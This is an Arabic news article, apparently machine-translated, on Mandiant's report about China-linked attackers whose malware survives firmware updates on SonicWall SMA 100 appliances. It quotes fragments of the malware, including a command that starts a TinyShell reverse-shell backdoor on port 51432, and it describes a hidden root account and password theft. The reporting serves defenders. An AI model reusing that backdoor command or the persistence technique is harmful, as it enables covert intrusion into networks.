تنجو البرامج الضارة التي تصيب أجهزة الأمان المستخدمة على نطاق واسع من تحديثات البرامج الثابتة

قال باحثون إن جهات التهديد المرتبطة بالحكومة الصينية تصيب جهاز أمان مستخدمًا على نطاق واسع من SonicWall ببرامج ضارة تظل نشطة حتى بعد أن يتلقى الجهاز تحديثات البرامج الثابتة.

سونيك وولز الوصول الآمن عبر الهاتف المتحرك 100 هو جهاز آمن للوصول عن بعد يساعد المؤسسات على نشر القوى العاملة عن بُعد بأمان. يستخدمه العملاء لمنح عناصر تحكم وصول دقيقة للمستخدمين البعيدين ، وتوفير اتصالات VPN لشبكات المؤسسة ، وتعيين ملفات تعريف فريدة لكل موظف. إن وصول SMA 100 إلى شبكات العملاء يجعله هدفًا جذابًا للجهات الفاعلة في التهديد.

في عام 2021 ، الجهاز تعرضت للهجوم من قبل قراصنة متطورين استغلوا ما كان في ذلك الحين ثغرة يوم الصفر. أجهزة الأمن من فورتينت و نبض آمن تعرضت لهجمات مماثلة في السنوات الأخيرة.

اكتساب ثبات طويل الأمد داخل الشبكات

يوم الخميس ، نشرت شركة الأمن Mandiant أ تقرير قال إن الجهات الفاعلة في التهديد التي يشتبه في ارتباطها بالصين قد انخرطت في حملة للحفاظ على استمرارية طويلة المدى من خلال تشغيل برامج ضارة على أجهزة SonicWall SMA غير المصححة. تميزت الحملة بقدرة البرامج الضارة على البقاء على الأجهزة حتى بعد أن تلقت البرامج الثابتة الخاصة بها برامج ثابتة جديدة.

كتب باحثو مانديانت دانيال لي وستيفن إيكلز وبن ريد: “بذل المهاجمون جهدًا كبيرًا في استقرار واستمرار أدواتهم”. “يسمح هذا لوصولهم إلى الشبكة بالاستمرار من خلال تحديثات البرامج الثابتة والحفاظ على موطئ قدم على الشبكة من خلال جهاز SonicWall.”

لتحقيق هذا الاستمرارية ، يتحقق البرنامج الضار من ترقيات البرامج الثابتة المتاحة كل 10 ثوانٍ. عندما يتوفر تحديث ، يقوم البرنامج الضار بنسخ الملف المؤرشف للنسخ الاحتياطي ، ويفك ضغطه ، ويثبته ، ثم ينسخ حزمة الملفات الضارة بالكامل إليه. تضيف البرامج الضارة أيضًا مستخدمًا جذريًا خلفيًا إلى الملف الذي تم تحميله. بعد ذلك ، تعيد البرامج الضارة ضغط الملف حتى يكون جاهزًا للتثبيت.

كتب الباحثون: “هذه التقنية ليست معقدة بشكل خاص ، لكنها تُظهر جهدًا كبيرًا من جانب المهاجم لفهم دورة تحديث الجهاز ، ثم تطوير واختبار طريقة للمثابرة”.

تتوافق تقنيات الاستمرارية مع حملة هجوم في عام 2021 استخدمت فيها 16 عائلة من البرامج الضارة تصيب أجهزة Pulse Safe. أرجع مانديانت الهجمات إلى مجموعات تهديد متعددة ، بما في ذلك تلك التي تم تعقبها باسم UNC2630 ، UNC2717 ، والتي قالت الشركة إنها تدعم “الأولويات الرئيسية للحكومة الصينية”. أرجع مانديانت الهجمات المستمرة ضد عملاء SonicWall SMA 100 إلى مجموعة تم تتبعها باسم UNC4540.

“في السنوات الأخيرة ، نشر المهاجمون الصينيون العديد من عمليات الاستغلال والبرامج الضارة في يوم الصفر لمجموعة متنوعة من أجهزة الشبكة التي تواجه الإنترنت كطريق للتطفل الكامل على المؤسسة ، والمثال الذي تم الإبلاغ عنه هنا هو جزء من نمط حديث تتوقع Mandiant استمراره في على المدى القريب ، كتب باحثو مانديانت في تقرير يوم الخميس.

وصول ذو امتيازات عالية

يبدو أن الغرض الرئيسي من البرنامج الضار هو سرقة كلمات المرور المشفرة لجميع المستخدمين الذين قاموا بتسجيل الدخول. كما يوفر أيضًا قشرة ويب يمكن أن يستخدمها ممثل التهديد لتثبيت برامج ضارة جديدة.

وكتب الباحثون في تقرير يوم الخميس: “كشف تحليل جهاز مخترق عن مجموعة من الملفات التي تمنح المهاجم وصولاً ذا امتيازات عالية ومتاحة إلى الجهاز”. “تتكون البرامج الضارة من سلسلة من نصوص bash وثنائي ELF واحد تم تحديده على أنه أحد متغيرات TinyShell. يُظهر السلوك العام لمجموعة نصوص bash الخبيثة فهماً مفصلاً للجهاز ومصمم جيدًا للنظام لتوفير الاستقرار والمثابرة “.

قائمة البرامج الضارة هي:

وتابع التقرير:

نقطة إدخال البرامج الضارة الرئيسية هي نص برمجي bash مسمى firewalld، والتي تنفذ الحلقة الأساسية مرة واحدة لعدد كل ملف على النظام التربيعي: …for j in $(ls / -R) do for i in $(ls / -R) do:… البرنامج النصي مسؤول عن تنفيذ أمر SQL لإنجاز سرقة بيانات الاعتماد وتنفيذ المكونات الأخرى.

الوظيفة الأولى في firewalld ينفذ الباب الخلفي TinyShell httpsd بأمر nohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 & إذا كان httpsd العملية لا تعمل بالفعل. يؤدي هذا إلى تعيين TinyShell إلى وضع shell العكسي ، وإرشادها إلى الاتصال بعنوان IP والمنفذ المذكورين أعلاه في وقت ويوم محددين يمثلهما -m العلم ، مع فاصل منارة محدد بواسطة -d علَم. يقوم الثنائي بتضمين عنوان IP مشفر الثابت ، والذي يتم استخدامه في وضع الغلاف العكسي إذا تم ترك وسيطة عنوان IP فارغة. كما أن لديها وضع صدفة استماع متاح.

قال الباحثون إنهم لا يعرفون ما هو ناقل العدوى الأولي.

في الأسبوع الماضي ، نشرت SonicWall ملف استشاري التي حثت مستخدمي SMA 100 على الترقية إلى الإصدار 10.2.1.7 أو أعلى. تتضمن هذه الإصدارات تحسينات مثل مراقبة تكامل الملفات وتحديد العمليات الشاذة. التصحيح متاح هنا. يجب على المستخدمين أيضًا مراجعة السجلات بانتظام بحثًا عن علامات الاختراق ، بما في ذلك عمليات تسجيل الدخول غير الطبيعية أو حركة المرور الداخلية.